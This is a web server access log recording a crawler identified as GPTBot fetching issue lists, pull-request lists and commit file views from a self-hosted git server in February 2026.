192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11074] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11072] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10260] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10259] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10258] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10263] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:35:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" +[17/Feb/2026:18:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:18:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:18:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:18:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=latest&state=closed&type=all" +[17/Feb/2026:18:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=latest&state=closed&type=all" +[17/Feb/2026:18:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=source" [Client 74.7.227.38] [Length 13328] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:18:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=rendered" [Client 74.7.227.38] [Length 12566] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:18:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" +[17/Feb/2026:18:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&state=closed&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&state=closed&type=all" 